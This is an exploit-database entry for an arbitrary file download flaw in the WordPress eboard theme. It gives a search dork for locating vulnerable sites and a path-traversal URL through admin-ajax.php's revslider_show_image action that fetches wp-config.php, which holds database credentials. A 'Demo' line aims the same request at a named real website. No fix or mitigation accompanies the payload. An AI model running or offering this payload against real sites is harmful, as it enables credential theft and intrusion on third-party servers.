id: 22629
date: 09/12/2014
title: WordPress eboard theme Arbitrary File Download
author: JK0x00
cves: 

#++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : WordPress eboard theme Arbitrary File Download Vulnerability
# Author : JK
# Vendor Homepage : 
# http://themeforest.net/item/eboard-all-around-wordpress-theme/3548686
# Risk : High
# Class: Remote
# Google Dork: inurl:/wp-content/themes/eboard/
# Date: 13/09/2014
# Greetz to : All Egy-Shell Team Members
# Tested on : Windows 7 / Mozilla Firefox
#                     Linux / Mozilla Firefox
#+++++++++++++++++++++++++++++++++++++++++++++++++++

poc :
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Demo:
http://patrickcoman.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2023-03-26]  #